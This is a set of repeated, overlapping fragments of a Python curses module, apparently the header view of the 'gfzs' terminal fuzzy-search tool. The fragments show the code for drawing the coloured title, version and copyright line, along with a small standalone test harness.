logger.debug(\"init curses\") stdscr = curses.initscr() color.init() #", "= None try: target.run() except curses.error as e: error = str(e) finally: target._end_curses()", "% progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint)", "color.init() # turn off automatic echoing of keys to the screen curses.noecho() #", "gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as", "debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" %", "local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config as runtime_config import", "gfzs」 # need when 「cat fixtures/rust.json | bin/gfzs」 else: from gfzs import info", "sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config as runtime_config import utils.color as color", "curses.curs_set(0) target = TestHeader(stdscr) error = None try: target.run() except curses.error as e:", "from model import Model import runtime.config as runtime_config import utils.color as color progname", "to the screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the", "need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base", "user_input == curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import signal # local #", "color progname = \"gfzs.views.header\" properties = 
{\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties)", "c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE)", "Model import runtime.config as runtime_config import utils.color as color progname = \"gfzs.views.header\" properties", "\"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while True:", "create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header()", "as color progname = \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"}", "gfzs.views.base import Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug", "base import Base if os.environ.get(\"DEBUG\"): import utils.debug as debug # need when 「cat", "+ 1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width -", "as logger from base import Base if os.environ.get(\"DEBUG\"): import utils.debug as debug #", "self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy start_index", "%s\" % error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a window object representing", "# need when 「cat fixtures/rust.json | bin/gfzs」 else: from gfzs import info from", "except curses.error: continue except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: self.reset() if __name__", "print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a window object", "+= len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version()) # 
Write Copyright self.window.addstr( 0,", "Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search", "i in range(len(google)): c = google[i] if c == \"o\": if first_o: first_o", "self.parent_width ) if __name__ == \"__main__\": class TestHeader(Header): def run(self): self._loop() def _end_curses(self):", "self.window.getch() except curses.error: continue except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: self.reset() if", "len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if", "is invalid.'\") print(\"Config is invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error: %s\" %", "invalid.'\") print(\"Config is invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error)", "self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search start_index += len(FUZZY) + 1 self.window.addstr(0,", "curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\": class TestHeader(Header): def run(self):", "debug # need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info", "logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need when 「python3 gfzs/controller.py」 except", "GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\" try: # need when", "Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor. 
curses.curs_set(0) target =", "curses import os, sys GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\"", "as debug # need when 「cat fixtures/rust.json | python -m gfzs」 # need", "if __name__ == \"__main__\": class TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\" Terminates", "error = None try: target.run() except curses.error as e: error = str(e) finally:", "self.color.search()) # Write verion start_index += len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version())", "logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print]", "# https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 # Write Google google = list(GOOGLE)", "verion start_index += len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright", "import os, sys GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\" try:", "start_index, SEARCH, self.color.search()) # Write verion start_index += len(SEARCH) + 1 self.window.addstr(0, start_index,", "in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns", "reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window =", "else: from gfzs import info from gfzs.views.base import Base import gfzs.utils.logger as logger", "== \"o\": if first_o: first_o = False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0,", "False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i,", "sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info 
from views.base import Base import utils.logger as logger if os.environ.get(\"DEBUG\"):", "TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\" Terminates the curses application. \"\"\" logger.debug(\"[TestHeader]", "\"Search\" try: # need when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/", "# https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config as runtime_config import utils.color", "+ 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion start_index += len(SEARCH) +", "keys to the screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable", "# need when 「cat fixtures/rust.json | python -m gfzs」 # need when 「cat", "# local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config as runtime_config", "== \"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model", "stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" % info.__version__ self.copyright = info.__copyright__ def", "'Config is invalid.'\") print(\"Config is invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error: %s\"", "utils.debug as debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version =", "Search start_index += len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion", "import gfzs.utils.debug as debug # need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # 
https://codechacha.com/ja/how-to-import-python-files/", "gfzs import info from gfzs.views.base import Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"):", "# need when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import", "info import utils.logger as logger from base import Base if os.environ.get(\"DEBUG\"): import utils.debug", "# Write Google google = list(GOOGLE) first_o = True for i in range(len(google)):", "initscr() returns a window object representing the entire screen. logger.debug(\"init curses\") stdscr =", "-m gfzs」 # need when 「cat fixtures/rust.json | bin/gfzs」 else: from gfzs import", "super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" % info.__version__ self.copyright = info.__copyright__ def create(self):", "info from views.base import Base import utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug", "= str(e) finally: target._end_curses() if error != None: logger.error(error) print(error) logger.debug(\"end %s\" %", "ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base import utils.logger as", "= TestHeader(stdscr) error = None try: target.run() except curses.error as e: error =", "Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" % info.__version__ self.copyright", "utils.logger as logger from base import Base if os.environ.get(\"DEBUG\"): import utils.debug as debug", "self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0)", "progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start 
%s\" % progname) def handle_sigint(signum, frame):", "curses.cbreak() # Disable the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error = None", "import curses import os, sys GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH =", "os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\")", "runtime.config as runtime_config import utils.color as color progname = \"gfzs.views.header\" properties = {\"progname\":", "runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\") for error", "= curses.initscr() color.init() # turn off automatic echoing of keys to the screen", "SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config", "start_index, self.version, self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(),", "utils.color as color progname = \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0, \"log_path\":", "self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self):", "from base import Base if os.environ.get(\"DEBUG\"): import utils.debug as debug # need when", "not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\") for error in runtime_config.errors:", "_loop(self): self.create() while True: try: user_input = self.window.getch() except curses.error: continue except KeyboardInterrupt:", "self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE) +", "self.color.version()) # Write Copyright 
self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline(", "== \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger from base", "curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while True: try: user_input =", "import utils.logger as logger from base import Base if os.environ.get(\"DEBUG\"): import utils.debug as", "for i in range(len(google)): c = google[i] if c == \"o\": if first_o:", "https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config as runtime_config import utils.color as", "self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy())", "「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base", "c, self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY,", "list(GOOGLE) first_o = True for i in range(len(google)): c = google[i] if c", "https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base import utils.logger as logger if", "properties = {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname)", "== \"__main__\": class TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\" Terminates the curses", "while True: try: user_input = self.window.getch() except 
curses.error: continue except KeyboardInterrupt: break if", "def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width =", "logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a window object representing the entire screen.", "curses.error: continue except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: self.reset() if __name__ ==", "= \"(%s)\" % info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header()", "as runtime_config import utils.color as color progname = \"gfzs.views.header\" properties = {\"progname\": progname,", "info from gfzs.views.base import Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug", "curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while True: try: user_input = self.window.getch()", "self.create() while True: try: user_input = self.window.getch() except curses.error: continue except KeyboardInterrupt: break", "as debug # need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import", "self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header]", "== curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/", "self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\": class TestHeader(Header): def run(self): self._loop() def", "fixtures/rust.json | python -m gfzs」 # need when 「cat fixtures/rust.json | bin/gfzs」 else:", "# Write Fuzzy start_index += 
len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) #", "Write Search start_index += len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write", "error in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1) # initscr()", "\"Fuzzy\" SEARCH = \"Search\" try: # need when 「python3 gfzs/views/header.py」 if __name__ ==", "= True for i in range(len(google)): c = google[i] if c == \"o\":", "fixtures/rust.json | bin/gfzs」 else: from gfzs import info from gfzs.views.base import Base import", "print(\"Config is invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit", "True for i in range(len(google)): c = google[i] if c == \"o\": if", "the screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse", "the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error = None try: target.run() except", "Base import utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base):", "1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\": class TestHeader(Header):", "progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init()", "screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor.", "def run(self): self._loop() def _end_curses(self): \"\"\" Terminates the curses application. 
\"\"\" logger.debug(\"[TestHeader] end", "curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))", "need when 「cat fixtures/rust.json | python -m gfzs」 # need when 「cat fixtures/rust.json", "info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self):", "\"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\" try: # need when 「python3 gfzs/views/header.py」", "self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion start_index += len(SEARCH) + 1 self.window.addstr(0,", "import Base if os.environ.get(\"DEBUG\"): import utils.debug as debug # need when 「cat fixtures/rust.json", "None try: target.run() except curses.error as e: error = str(e) finally: target._end_curses() if", "cursor. curses.curs_set(0) target = TestHeader(stdscr) error = None try: target.run() except curses.error as", "self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0,", "when 「cat fixtures/rust.json | python -m gfzs」 # need when 「cat fixtures/rust.json |", "self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__ ==", "if os.environ.get(\"DEBUG\"): import utils.debug as debug # need when 「cat fixtures/rust.json | python", "1\") sys.exit(1) # initscr() returns a window object representing the entire screen. 
logger.debug(\"init", "「cat fixtures/rust.json | bin/gfzs」 else: from gfzs import info from gfzs.views.base import Base", "if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need when 「python3 gfzs/controller.py」 except ModuleNotFoundError:", "= self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index", "0 # Write Google google = list(GOOGLE) first_o = True for i in", "except curses.error as e: error = str(e) finally: target._end_curses() if error != None:", "import Base import utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug as debug class", "= \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\"", "FUZZY = \"Fuzzy\" SEARCH = \"Search\" try: # need when 「python3 gfzs/views/header.py」 if", "import info import utils.logger as logger from base import Base if os.environ.get(\"DEBUG\"): import", "\"(%s)\" % info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh()", "python -m gfzs」 # need when 「cat fixtures/rust.json | bin/gfzs」 else: from gfzs", "from views.base import Base import utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug as", "SEARCH = \"Search\" try: # need when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\":", "= {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def", "stdscr = curses.initscr() color.init() # turn off automatic echoing of keys to the", "the curses application. 
\"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self):", "need when 「cat fixtures/rust.json | bin/gfzs」 else: from gfzs import info from gfzs.views.base", "self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE |", "FUZZY, self.color.fuzzy()) # Write Search start_index += len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH,", "# Write Search start_index += len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) #", "self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__", "signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\")", "Write verion start_index += len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write", "self.color.fuzzy()) # Write Search start_index += len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search())", "import utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base): def", "google = list(GOOGLE) first_o = True for i in range(len(google)): c = google[i]", "self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0,", "self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\": class", "try: user_input = self.window.getch() except curses.error: continue except KeyboardInterrupt: break if user_input ==", "c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) #", "c == \"o\": if 
first_o: first_o = False self.window.addstr(0, i, c, self.color.google(\"o\")) else:", "| python -m gfzs」 # need when 「cat fixtures/rust.json | bin/gfzs」 else: from", "「cat fixtures/rust.json | python -m gfzs」 # need when 「cat fixtures/rust.json | bin/gfzs」", "= google[i] if c == \"o\": if first_o: first_o = False self.window.addstr(0, i,", "def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" % info.__version__ self.copyright =", "handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not", "progname = \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start", "when 「cat fixtures/rust.json | bin/gfzs」 else: from gfzs import info from gfzs.views.base import", "utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base): def __init__(self,", "1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright),", "self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self):", "def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0) #", "if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\") for error in", "sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger from base import Base if os.environ.get(\"DEBUG\"):", "break if user_input == curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import signal #", "KeyboardInterrupt: break if user_input == 
curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import signal", "gfzs.utils.debug as debug # need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\"))))", "| bin/gfzs」 else: from gfzs import info from gfzs.views.base import Base import gfzs.utils.logger", "range(len(google)): c = google[i] if c == \"o\": if first_o: first_o = False", "if c == \"o\": if first_o: first_o = False self.window.addstr(0, i, c, self.color.google(\"o\"))", "in range(len(google)): c = google[i] if c == \"o\": if first_o: first_o =", "start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search start_index", "off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr)", "0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 # Write Google google =", "def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if", "% info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def", "\"o\": if first_o: first_o = False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i,", "https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger from base import Base if", "object representing the entire screen. 
logger.debug(\"init curses\") stdscr = curses.initscr() color.init() # turn", "create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def", "logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0)", "Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE", "# Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor. curses.curs_set(0) target", "curses\") stdscr = curses.initscr() color.init() # turn off automatic echoing of keys to", "= \"Fuzzy\" SEARCH = \"Search\" try: # need when 「python3 gfzs/views/header.py」 if __name__", "self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while True: try: user_input = self.window.getch() except", "self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright,", "\"\"\" Terminates the curses application. \"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin()", "curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor. 
curses.curs_set(0)", "echoing of keys to the screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak()", "= list(GOOGLE) first_o = True for i in range(len(google)): c = google[i] if", "when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import", "i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy start_index +=", "import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config", "import info from gfzs.views.base import Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import", "self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width", "returns a window object representing the entire screen. logger.debug(\"init curses\") stdscr = curses.initscr()", "def _end_curses(self): \"\"\" Terminates the curses application. 
\"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0)", "need when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info", "model import Model import runtime.config as runtime_config import utils.color as color progname =", "target.run() except curses.error as e: error = str(e) finally: target._end_curses() if error !=", "= 0 # Write Google google = list(GOOGLE) first_o = True for i", "self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height,", ") if __name__ == \"__main__\": class TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\"", "len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search start_index += len(FUZZY)", "curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 # Write", "first_o = False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else:", "%s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT,", "# Write verion start_index += len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version()) #", "google[i] if c == \"o\": if first_o: first_o = False self.window.addstr(0, i, c,", "self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2,", "self.window = curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def 
_make_header(self): start_index = 0", "os, sys GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\" try: #", "gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base import", "sys GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\" try: # need", "Write Google google = list(GOOGLE) first_o = True for i in range(len(google)): c", "else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy", ") self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\":", "views.base import Base import utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug as debug", "representing the entire screen. logger.debug(\"init curses\") stdscr = curses.initscr() color.init() # turn off", "logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\") for error in runtime_config.errors: logger.error(error) 